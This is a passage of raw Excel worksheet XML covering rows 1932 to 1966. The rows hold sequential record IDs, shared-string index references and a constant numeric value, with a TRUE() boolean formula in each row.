      <c r="U1932" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1933" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1933" s="1">
        <v>18301</v>
      </c>
      <c r="B1933" t="s">
        <v>0</v>
      </c>
      <c r="C1933" t="s">
        <v>78</v>
      </c>
      <c r="D1933" t="s">
        <v>2097</v>
      </c>
      <c r="E1933" t="s">
        <v>1227</v>
      </c>
      <c r="F1933">
        <v>29117300</v>
      </c>
      <c r="G1933" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1933" t="s">
        <v>2271</v>
      </c>
      <c r="K1933">
        <v>0</v>
      </c>
      <c r="L1933" t="s">
        <v>98</v>
      </c>
      <c r="R1933" t="s">
        <v>5</v>
      </c>
      <c r="S1933" t="s">
        <v>1229</v>
      </c>
      <c r="T1933" t="s">
        <v>7</v>
      </c>
      <c r="U1933" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1934" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1934" s="1">
        <v>18302</v>
      </c>
      <c r="B1934" t="s">
        <v>0</v>
      </c>
      <c r="C1934" t="s">
        <v>78</v>
      </c>
      <c r="D1934" t="s">
        <v>2097</v>
      </c>
      <c r="E1934" t="s">
        <v>1227</v>
      </c>
      <c r="F1934">
        <v>29117300</v>
      </c>
      <c r="G1934" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1934" t="s">
        <v>2272</v>
      </c>
      <c r="K1934">
        <v>0</v>
      </c>
      <c r="L1934" t="s">
        <v>98</v>
      </c>
      <c r="R1934" t="s">
        <v>5</v>
      </c>
      <c r="S1934" t="s">
        <v>1229</v>
      </c>
      <c r="T1934" t="s">
        <v>7</v>
      </c>
      <c r="U1934" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1935" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1935" s="1">
        <v>18303</v>
      </c>
      <c r="B1935" t="s">
        <v>0</v>
      </c>
      <c r="C1935" t="s">
        <v>78</v>
      </c>
      <c r="D1935" t="s">
        <v>2097</v>
      </c>
      <c r="E1935" t="s">
        <v>1227</v>
      </c>
      <c r="F1935">
        <v>29117300</v>
      </c>
      <c r="G1935" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1935" t="s">
        <v>2273</v>
      </c>
      <c r="K1935">
        <v>0</v>
      </c>
      <c r="L1935" t="s">
        <v>98</v>
      </c>
      <c r="R1935" t="s">
        <v>5</v>
      </c>
      <c r="S1935" t="s">
        <v>1229</v>
      </c>
      <c r="T1935" t="s">
        <v>7</v>
      </c>
      <c r="U1935" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1936" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1936" s="1">
        <v>18304</v>
      </c>
      <c r="B1936" t="s">
        <v>0</v>
      </c>
      <c r="C1936" t="s">
        <v>78</v>
      </c>
      <c r="D1936" t="s">
        <v>2097</v>
      </c>
      <c r="E1936" t="s">
        <v>1227</v>
      </c>
      <c r="F1936">
        <v>29117300</v>
      </c>
      <c r="G1936" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1936" t="s">
        <v>2274</v>
      </c>
      <c r="K1936">
        <v>0</v>
      </c>
      <c r="L1936" t="s">
        <v>98</v>
      </c>
      <c r="R1936" t="s">
        <v>5</v>
      </c>
      <c r="S1936" t="s">
        <v>1229</v>
      </c>
      <c r="T1936" t="s">
        <v>7</v>
      </c>
      <c r="U1936" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1937" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1937" s="1">
        <v>18305</v>
      </c>
      <c r="B1937" t="s">
        <v>0</v>
      </c>
      <c r="C1937" t="s">
        <v>78</v>
      </c>
      <c r="D1937" t="s">
        <v>2097</v>
      </c>
      <c r="E1937" t="s">
        <v>1227</v>
      </c>
      <c r="F1937">
        <v>29117300</v>
      </c>
      <c r="G1937" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1937" t="s">
        <v>2275</v>
      </c>
      <c r="K1937">
        <v>0</v>
      </c>
      <c r="L1937" t="s">
        <v>98</v>
      </c>
      <c r="R1937" t="s">
        <v>5</v>
      </c>
      <c r="S1937" t="s">
        <v>1229</v>
      </c>
      <c r="T1937" t="s">
        <v>7</v>
      </c>
      <c r="U1937" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1938" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1938" s="1">
        <v>18306</v>
      </c>
      <c r="B1938" t="s">
        <v>0</v>
      </c>
      <c r="C1938" t="s">
        <v>1</v>
      </c>
      <c r="D1938" t="s">
        <v>2097</v>
      </c>
      <c r="E1938" t="s">
        <v>1227</v>
      </c>
      <c r="F1938">
        <v>29117300</v>
      </c>
      <c r="G1938" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1938" t="s">
        <v>2276</v>
      </c>
      <c r="K1938">
        <v>0</v>
      </c>
      <c r="L1938" t="s">
        <v>98</v>
      </c>
      <c r="R1938" t="s">
        <v>5</v>
      </c>
      <c r="S1938" t="s">
        <v>1229</v>
      </c>
      <c r="T1938" t="s">
        <v>7</v>
      </c>
      <c r="U1938" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1939" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1939" s="1">
        <v>18307</v>
      </c>
      <c r="B1939" t="s">
        <v>0</v>
      </c>
      <c r="C1939" t="s">
        <v>78</v>
      </c>
      <c r="D1939" t="s">
        <v>2097</v>
      </c>
      <c r="E1939" t="s">
        <v>1227</v>
      </c>
      <c r="F1939">
        <v>29117300</v>
      </c>
      <c r="G1939" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1939" t="s">
        <v>2277</v>
      </c>
      <c r="K1939">
        <v>0</v>
      </c>
      <c r="L1939" t="s">
        <v>98</v>
      </c>
      <c r="R1939" t="s">
        <v>5</v>
      </c>
      <c r="S1939" t="s">
        <v>1229</v>
      </c>
      <c r="T1939" t="s">
        <v>7</v>
      </c>
      <c r="U1939" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1940" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1940" s="1">
        <v>18308</v>
      </c>
      <c r="B1940" t="s">
        <v>0</v>
      </c>
      <c r="C1940" t="s">
        <v>78</v>
      </c>
      <c r="D1940" t="s">
        <v>2097</v>
      </c>
      <c r="E1940" t="s">
        <v>1227</v>
      </c>
      <c r="F1940">
        <v>29117300</v>
      </c>
      <c r="G1940" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1940" t="s">
        <v>2278</v>
      </c>
      <c r="K1940">
        <v>0</v>
      </c>
      <c r="L1940" t="s">
        <v>98</v>
      </c>
      <c r="R1940" t="s">
        <v>5</v>
      </c>
      <c r="S1940" t="s">
        <v>1229</v>
      </c>
      <c r="T1940" t="s">
        <v>7</v>
      </c>
      <c r="U1940" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1941" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1941" s="1">
        <v>18309</v>
      </c>
      <c r="B1941" t="s">
        <v>0</v>
      </c>
      <c r="C1941" t="s">
        <v>78</v>
      </c>
      <c r="D1941" t="s">
        <v>2097</v>
      </c>
      <c r="E1941" t="s">
        <v>1227</v>
      </c>
      <c r="F1941">
        <v>29117300</v>
      </c>
      <c r="G1941" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1941" t="s">
        <v>2279</v>
      </c>
      <c r="K1941">
        <v>0</v>
      </c>
      <c r="L1941" t="s">
        <v>98</v>
      </c>
      <c r="R1941" t="s">
        <v>5</v>
      </c>
      <c r="S1941" t="s">
        <v>1229</v>
      </c>
      <c r="T1941" t="s">
        <v>7</v>
      </c>
      <c r="U1941" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1942" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1942" s="1">
        <v>18310</v>
      </c>
      <c r="B1942" t="s">
        <v>0</v>
      </c>
      <c r="C1942" t="s">
        <v>78</v>
      </c>
      <c r="D1942" t="s">
        <v>2097</v>
      </c>
      <c r="E1942" t="s">
        <v>1227</v>
      </c>
      <c r="F1942">
        <v>29117300</v>
      </c>
      <c r="G1942" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1942" t="s">
        <v>2280</v>
      </c>
      <c r="K1942">
        <v>0</v>
      </c>
      <c r="L1942" t="s">
        <v>98</v>
      </c>
      <c r="R1942" t="s">
        <v>5</v>
      </c>
      <c r="S1942" t="s">
        <v>1229</v>
      </c>
      <c r="T1942" t="s">
        <v>7</v>
      </c>
      <c r="U1942" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1943" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1943" s="1">
        <v>18311</v>
      </c>
      <c r="B1943" t="s">
        <v>0</v>
      </c>
      <c r="C1943" t="s">
        <v>78</v>
      </c>
      <c r="D1943" t="s">
        <v>2097</v>
      </c>
      <c r="E1943" t="s">
        <v>1227</v>
      </c>
      <c r="F1943">
        <v>29117300</v>
      </c>
      <c r="G1943" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1943" t="s">
        <v>2281</v>
      </c>
      <c r="K1943">
        <v>0</v>
      </c>
      <c r="L1943" t="s">
        <v>98</v>
      </c>
      <c r="R1943" t="s">
        <v>5</v>
      </c>
      <c r="S1943" t="s">
        <v>1229</v>
      </c>
      <c r="T1943" t="s">
        <v>7</v>
      </c>
      <c r="U1943" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1944" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1944" s="1">
        <v>18312</v>
      </c>
      <c r="B1944" t="s">
        <v>0</v>
      </c>
      <c r="C1944" t="s">
        <v>78</v>
      </c>
      <c r="D1944" t="s">
        <v>2097</v>
      </c>
      <c r="E1944" t="s">
        <v>1227</v>
      </c>
      <c r="F1944">
        <v>29117300</v>
      </c>
      <c r="G1944" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1944" t="s">
        <v>2282</v>
      </c>
      <c r="K1944">
        <v>0</v>
      </c>
      <c r="L1944" t="s">
        <v>98</v>
      </c>
      <c r="R1944" t="s">
        <v>5</v>
      </c>
      <c r="S1944" t="s">
        <v>1229</v>
      </c>
      <c r="T1944" t="s">
        <v>7</v>
      </c>
      <c r="U1944" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1945" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1945" s="1">
        <v>18313</v>
      </c>
      <c r="B1945" t="s">
        <v>0</v>
      </c>
      <c r="C1945" t="s">
        <v>78</v>
      </c>
      <c r="D1945" t="s">
        <v>2097</v>
      </c>
      <c r="E1945" t="s">
        <v>1227</v>
      </c>
      <c r="F1945">
        <v>29117300</v>
      </c>
      <c r="G1945" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1945" t="s">
        <v>2283</v>
      </c>
      <c r="K1945">
        <v>0</v>
      </c>
      <c r="L1945" t="s">
        <v>98</v>
      </c>
      <c r="R1945" t="s">
        <v>5</v>
      </c>
      <c r="S1945" t="s">
        <v>1229</v>
      </c>
      <c r="T1945" t="s">
        <v>7</v>
      </c>
      <c r="U1945" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1946" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1946" s="1">
        <v>18314</v>
      </c>
      <c r="B1946" t="s">
        <v>0</v>
      </c>
      <c r="C1946" t="s">
        <v>78</v>
      </c>
      <c r="D1946" t="s">
        <v>2097</v>
      </c>
      <c r="E1946" t="s">
        <v>1227</v>
      </c>
      <c r="F1946">
        <v>29117300</v>
      </c>
      <c r="G1946" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1946" t="s">
        <v>2284</v>
      </c>
      <c r="K1946">
        <v>0</v>
      </c>
      <c r="L1946" t="s">
        <v>98</v>
      </c>
      <c r="R1946" t="s">
        <v>5</v>
      </c>
      <c r="S1946" t="s">
        <v>1229</v>
      </c>
      <c r="T1946" t="s">
        <v>7</v>
      </c>
      <c r="U1946" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1947" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1947" s="1">
        <v>18315</v>
      </c>
      <c r="B1947" t="s">
        <v>0</v>
      </c>
      <c r="C1947" t="s">
        <v>78</v>
      </c>
      <c r="D1947" t="s">
        <v>2097</v>
      </c>
      <c r="E1947" t="s">
        <v>1227</v>
      </c>
      <c r="F1947">
        <v>29117300</v>
      </c>
      <c r="G1947" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1947" t="s">
        <v>2285</v>
      </c>
      <c r="K1947">
        <v>0</v>
      </c>
      <c r="L1947" t="s">
        <v>98</v>
      </c>
      <c r="R1947" t="s">
        <v>5</v>
      </c>
      <c r="S1947" t="s">
        <v>1229</v>
      </c>
      <c r="T1947" t="s">
        <v>7</v>
      </c>
      <c r="U1947" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1948" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1948" s="1">
        <v>18316</v>
      </c>
      <c r="B1948" t="s">
        <v>0</v>
      </c>
      <c r="C1948" t="s">
        <v>78</v>
      </c>
      <c r="D1948" t="s">
        <v>2097</v>
      </c>
      <c r="E1948" t="s">
        <v>1227</v>
      </c>
      <c r="F1948">
        <v>29117300</v>
      </c>
      <c r="G1948" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1948" t="s">
        <v>2286</v>
      </c>
      <c r="K1948">
        <v>0</v>
      </c>
      <c r="L1948" t="s">
        <v>98</v>
      </c>
      <c r="R1948" t="s">
        <v>5</v>
      </c>
      <c r="S1948" t="s">
        <v>1229</v>
      </c>
      <c r="T1948" t="s">
        <v>7</v>
      </c>
      <c r="U1948" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1949" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1949" s="1">
        <v>18317</v>
      </c>
      <c r="B1949" t="s">
        <v>0</v>
      </c>
      <c r="C1949" t="s">
        <v>78</v>
      </c>
      <c r="D1949" t="s">
        <v>2097</v>
      </c>
      <c r="E1949" t="s">
        <v>1227</v>
      </c>
      <c r="F1949">
        <v>29117300</v>
      </c>
      <c r="G1949" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1949" t="s">
        <v>2287</v>
      </c>
      <c r="K1949">
        <v>0</v>
      </c>
      <c r="L1949" t="s">
        <v>98</v>
      </c>
      <c r="R1949" t="s">
        <v>5</v>
      </c>
      <c r="S1949" t="s">
        <v>1229</v>
      </c>
      <c r="T1949" t="s">
        <v>7</v>
      </c>
      <c r="U1949" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1950" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1950" s="1">
        <v>18318</v>
      </c>
      <c r="B1950" t="s">
        <v>0</v>
      </c>
      <c r="C1950" t="s">
        <v>78</v>
      </c>
      <c r="D1950" t="s">
        <v>2097</v>
      </c>
      <c r="E1950" t="s">
        <v>1227</v>
      </c>
      <c r="F1950">
        <v>29117300</v>
      </c>
      <c r="G1950" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1950" t="s">
        <v>2288</v>
      </c>
      <c r="K1950">
        <v>0</v>
      </c>
      <c r="L1950" t="s">
        <v>98</v>
      </c>
      <c r="R1950" t="s">
        <v>5</v>
      </c>
      <c r="S1950" t="s">
        <v>1229</v>
      </c>
      <c r="T1950" t="s">
        <v>7</v>
      </c>
      <c r="U1950" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1951" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1951" s="1">
        <v>18319</v>
      </c>
      <c r="B1951" t="s">
        <v>0</v>
      </c>
      <c r="C1951" t="s">
        <v>78</v>
      </c>
      <c r="D1951" t="s">
        <v>2097</v>
      </c>
      <c r="E1951" t="s">
        <v>1227</v>
      </c>
      <c r="F1951">
        <v>29117300</v>
      </c>
      <c r="G1951" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1951" t="s">
        <v>2289</v>
      </c>
      <c r="K1951">
        <v>0</v>
      </c>
      <c r="L1951" t="s">
        <v>98</v>
      </c>
      <c r="R1951" t="s">
        <v>5</v>
      </c>
      <c r="S1951" t="s">
        <v>1229</v>
      </c>
      <c r="T1951" t="s">
        <v>7</v>
      </c>
      <c r="U1951" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1952" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1952" s="1">
        <v>18320</v>
      </c>
      <c r="B1952" t="s">
        <v>0</v>
      </c>
      <c r="C1952" t="s">
        <v>78</v>
      </c>
      <c r="D1952" t="s">
        <v>2097</v>
      </c>
      <c r="E1952" t="s">
        <v>1227</v>
      </c>
      <c r="F1952">
        <v>29117300</v>
      </c>
      <c r="G1952" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1952" t="s">
        <v>2290</v>
      </c>
      <c r="K1952">
        <v>0</v>
      </c>
      <c r="L1952" t="s">
        <v>98</v>
      </c>
      <c r="R1952" t="s">
        <v>5</v>
      </c>
      <c r="S1952" t="s">
        <v>1229</v>
      </c>
      <c r="T1952" t="s">
        <v>7</v>
      </c>
      <c r="U1952" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1953" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1953" s="1">
        <v>18321</v>
      </c>
      <c r="B1953" t="s">
        <v>0</v>
      </c>
      <c r="C1953" t="s">
        <v>78</v>
      </c>
      <c r="D1953" t="s">
        <v>2097</v>
      </c>
      <c r="E1953" t="s">
        <v>1227</v>
      </c>
      <c r="F1953">
        <v>29117300</v>
      </c>
      <c r="G1953" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1953" t="s">
        <v>2291</v>
      </c>
      <c r="K1953">
        <v>0</v>
      </c>
      <c r="L1953" t="s">
        <v>98</v>
      </c>
      <c r="R1953" t="s">
        <v>5</v>
      </c>
      <c r="S1953" t="s">
        <v>1229</v>
      </c>
      <c r="T1953" t="s">
        <v>7</v>
      </c>
      <c r="U1953" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1954" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1954" s="1">
        <v>18322</v>
      </c>
      <c r="B1954" t="s">
        <v>0</v>
      </c>
      <c r="C1954" t="s">
        <v>78</v>
      </c>
      <c r="D1954" t="s">
        <v>2097</v>
      </c>
      <c r="E1954" t="s">
        <v>1227</v>
      </c>
      <c r="F1954">
        <v>29117300</v>
      </c>
      <c r="G1954" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1954" t="s">
        <v>2292</v>
      </c>
      <c r="K1954">
        <v>0</v>
      </c>
      <c r="L1954" t="s">
        <v>98</v>
      </c>
      <c r="R1954" t="s">
        <v>5</v>
      </c>
      <c r="S1954" t="s">
        <v>1229</v>
      </c>
      <c r="T1954" t="s">
        <v>7</v>
      </c>
      <c r="U1954" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1955" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1955" s="1">
        <v>18323</v>
      </c>
      <c r="B1955" t="s">
        <v>0</v>
      </c>
      <c r="C1955" t="s">
        <v>78</v>
      </c>
      <c r="D1955" t="s">
        <v>2097</v>
      </c>
      <c r="E1955" t="s">
        <v>1227</v>
      </c>
      <c r="F1955">
        <v>29117300</v>
      </c>
      <c r="G1955" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1955" t="s">
        <v>2293</v>
      </c>
      <c r="K1955">
        <v>0</v>
      </c>
      <c r="L1955" t="s">
        <v>98</v>
      </c>
      <c r="R1955" t="s">
        <v>5</v>
      </c>
      <c r="S1955" t="s">
        <v>1229</v>
      </c>
      <c r="T1955" t="s">
        <v>7</v>
      </c>
      <c r="U1955" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1956" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1956" s="1">
        <v>18324</v>
      </c>
      <c r="B1956" t="s">
        <v>0</v>
      </c>
      <c r="C1956" t="s">
        <v>78</v>
      </c>
      <c r="D1956" t="s">
        <v>2097</v>
      </c>
      <c r="E1956" t="s">
        <v>1227</v>
      </c>
      <c r="F1956">
        <v>29117300</v>
      </c>
      <c r="G1956" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1956" t="s">
        <v>2294</v>
      </c>
      <c r="K1956">
        <v>0</v>
      </c>
      <c r="L1956" t="s">
        <v>98</v>
      </c>
      <c r="R1956" t="s">
        <v>5</v>
      </c>
      <c r="S1956" t="s">
        <v>1229</v>
      </c>
      <c r="T1956" t="s">
        <v>7</v>
      </c>
      <c r="U1956" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1957" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1957" s="1">
        <v>18325</v>
      </c>
      <c r="B1957" t="s">
        <v>0</v>
      </c>
      <c r="C1957" t="s">
        <v>78</v>
      </c>
      <c r="D1957" t="s">
        <v>2097</v>
      </c>
      <c r="E1957" t="s">
        <v>1227</v>
      </c>
      <c r="F1957">
        <v>29117300</v>
      </c>
      <c r="G1957" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1957" t="s">
        <v>2295</v>
      </c>
      <c r="K1957">
        <v>0</v>
      </c>
      <c r="L1957" t="s">
        <v>98</v>
      </c>
      <c r="R1957" t="s">
        <v>5</v>
      </c>
      <c r="S1957" t="s">
        <v>1229</v>
      </c>
      <c r="T1957" t="s">
        <v>7</v>
      </c>
      <c r="U1957" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1958" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1958" s="1">
        <v>18326</v>
      </c>
      <c r="B1958" t="s">
        <v>0</v>
      </c>
      <c r="C1958" t="s">
        <v>78</v>
      </c>
      <c r="D1958" t="s">
        <v>2097</v>
      </c>
      <c r="E1958" t="s">
        <v>1227</v>
      </c>
      <c r="F1958">
        <v>29117300</v>
      </c>
      <c r="G1958" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1958" t="s">
        <v>2296</v>
      </c>
      <c r="K1958">
        <v>0</v>
      </c>
      <c r="L1958" t="s">
        <v>98</v>
      </c>
      <c r="R1958" t="s">
        <v>5</v>
      </c>
      <c r="S1958" t="s">
        <v>1229</v>
      </c>
      <c r="T1958" t="s">
        <v>7</v>
      </c>
      <c r="U1958" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1959" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1959" s="1">
        <v>18327</v>
      </c>
      <c r="B1959" t="s">
        <v>0</v>
      </c>
      <c r="C1959" t="s">
        <v>1</v>
      </c>
      <c r="D1959" t="s">
        <v>2097</v>
      </c>
      <c r="E1959" t="s">
        <v>1227</v>
      </c>
      <c r="F1959">
        <v>29117300</v>
      </c>
      <c r="G1959" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1959" t="s">
        <v>2297</v>
      </c>
      <c r="K1959">
        <v>0</v>
      </c>
      <c r="L1959" t="s">
        <v>98</v>
      </c>
      <c r="R1959" t="s">
        <v>5</v>
      </c>
      <c r="S1959" t="s">
        <v>1229</v>
      </c>
      <c r="T1959" t="s">
        <v>7</v>
      </c>
      <c r="U1959" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1960" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1960" s="1">
        <v>18328</v>
      </c>
      <c r="B1960" t="s">
        <v>0</v>
      </c>
      <c r="C1960" t="s">
        <v>78</v>
      </c>
      <c r="D1960" t="s">
        <v>2097</v>
      </c>
      <c r="E1960" t="s">
        <v>1227</v>
      </c>
      <c r="F1960">
        <v>29117300</v>
      </c>
      <c r="G1960" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1960" t="s">
        <v>2298</v>
      </c>
      <c r="K1960">
        <v>0</v>
      </c>
      <c r="L1960" t="s">
        <v>98</v>
      </c>
      <c r="R1960" t="s">
        <v>5</v>
      </c>
      <c r="S1960" t="s">
        <v>1229</v>
      </c>
      <c r="T1960" t="s">
        <v>7</v>
      </c>
      <c r="U1960" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1961" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1961" s="1">
        <v>18329</v>
      </c>
      <c r="B1961" t="s">
        <v>0</v>
      </c>
      <c r="C1961" t="s">
        <v>78</v>
      </c>
      <c r="D1961" t="s">
        <v>2097</v>
      </c>
      <c r="E1961" t="s">
        <v>1227</v>
      </c>
      <c r="F1961">
        <v>29117300</v>
      </c>
      <c r="G1961" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1961" t="s">
        <v>2299</v>
      </c>
      <c r="K1961">
        <v>0</v>
      </c>
      <c r="L1961" t="s">
        <v>98</v>
      </c>
      <c r="R1961" t="s">
        <v>5</v>
      </c>
      <c r="S1961" t="s">
        <v>1229</v>
      </c>
      <c r="T1961" t="s">
        <v>7</v>
      </c>
      <c r="U1961" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1962" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1962" s="1">
        <v>18330</v>
      </c>
      <c r="B1962" t="s">
        <v>0</v>
      </c>
      <c r="C1962" t="s">
        <v>78</v>
      </c>
      <c r="D1962" t="s">
        <v>2097</v>
      </c>
      <c r="E1962" t="s">
        <v>1227</v>
      </c>
      <c r="F1962">
        <v>29117300</v>
      </c>
      <c r="G1962" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1962" t="s">
        <v>2300</v>
      </c>
      <c r="K1962">
        <v>0</v>
      </c>
      <c r="L1962" t="s">
        <v>98</v>
      </c>
      <c r="R1962" t="s">
        <v>5</v>
      </c>
      <c r="S1962" t="s">
        <v>1229</v>
      </c>
      <c r="T1962" t="s">
        <v>7</v>
      </c>
      <c r="U1962" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1963" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1963" s="1">
        <v>18331</v>
      </c>
      <c r="B1963" t="s">
        <v>0</v>
      </c>
      <c r="C1963" t="s">
        <v>78</v>
      </c>
      <c r="D1963" t="s">
        <v>2097</v>
      </c>
      <c r="E1963" t="s">
        <v>1227</v>
      </c>
      <c r="F1963">
        <v>29117300</v>
      </c>
      <c r="G1963" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1963" t="s">
        <v>2301</v>
      </c>
      <c r="K1963">
        <v>0</v>
      </c>
      <c r="L1963" t="s">
        <v>98</v>
      </c>
      <c r="R1963" t="s">
        <v>5</v>
      </c>
      <c r="S1963" t="s">
        <v>1229</v>
      </c>
      <c r="T1963" t="s">
        <v>7</v>
      </c>
      <c r="U1963" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1964" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1964" s="1">
        <v>18332</v>
      </c>
      <c r="B1964" t="s">
        <v>0</v>
      </c>
      <c r="C1964" t="s">
        <v>1</v>
      </c>
      <c r="D1964" t="s">
        <v>2097</v>
      </c>
      <c r="E1964" t="s">
        <v>1227</v>
      </c>
      <c r="F1964">
        <v>29117300</v>
      </c>
      <c r="G1964" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1964" t="s">
        <v>2302</v>
      </c>
      <c r="K1964">
        <v>0</v>
      </c>
      <c r="L1964" t="s">
        <v>98</v>
      </c>
      <c r="R1964" t="s">
        <v>5</v>
      </c>
      <c r="S1964" t="s">
        <v>1229</v>
      </c>
      <c r="T1964" t="s">
        <v>7</v>
      </c>
      <c r="U1964" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1965" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1965" s="1">
        <v>18333</v>
      </c>
      <c r="B1965" t="s">
        <v>0</v>
      </c>
      <c r="C1965" t="s">
        <v>78</v>
      </c>
      <c r="D1965" t="s">
        <v>2097</v>
      </c>
      <c r="E1965" t="s">
        <v>1227</v>
      </c>
      <c r="F1965">
        <v>29117300</v>
      </c>
      <c r="G1965" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1965" t="s">
        <v>2303</v>
      </c>
      <c r="K1965">
        <v>0</v>
      </c>
      <c r="L1965" t="s">
        <v>98</v>
      </c>
      <c r="R1965" t="s">
        <v>5</v>
      </c>
      <c r="S1965" t="s">
        <v>1229</v>
      </c>
      <c r="T1965" t="s">
        <v>7</v>
      </c>
      <c r="U1965" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1966" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1966" s="1">
        <v>18334</v>
      </c>
      <c r="B1966" t="s">
        <v>0</v>
      </c>
      <c r="C1966" t="s">
        <v>78</v>
      </c>
      <c r="D1966" t="s">
        <v>2097</v>
      </c>
      <c r="E1966" t="s">
        <v>1227</v>
      </c>
      <c r="F1966">
        <v>29117300</v>
      </c>
      <c r="G1966" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1966" t="s">
        <v>2304</v>
      </c>
      <c r="K1966">
        <v>0</v>
      </c>
      <c r="L1966" t="s">
        <v>98</v>
      </c>
      <c r="R1966" t="s">
        <v>5</v>
      </c>
      <c r="S1966" t="s">
        <v>1229</v>
      </c>
      <c r="T1966" t="s">
        <v>7</v>
      </c>
      <c r="U1966" t="s">
        <v>56</v>
      </c>
    </row>
